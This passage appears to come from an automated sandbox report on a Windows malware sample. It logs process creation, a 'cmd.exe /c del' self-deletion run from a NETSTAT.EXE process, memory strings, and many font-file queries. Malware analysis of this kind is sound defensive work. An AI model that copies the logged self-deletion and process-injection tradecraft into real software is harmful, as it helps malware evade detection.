            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000007.00000000.277343079.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000007.00000000.322048505.0000000001640000.00000002.00020000.sdmp, NETSTAT.EXE, 00000012.00000002.518694763.0000000005340000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Users\user\Desktop\Fu94e0b1TR.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
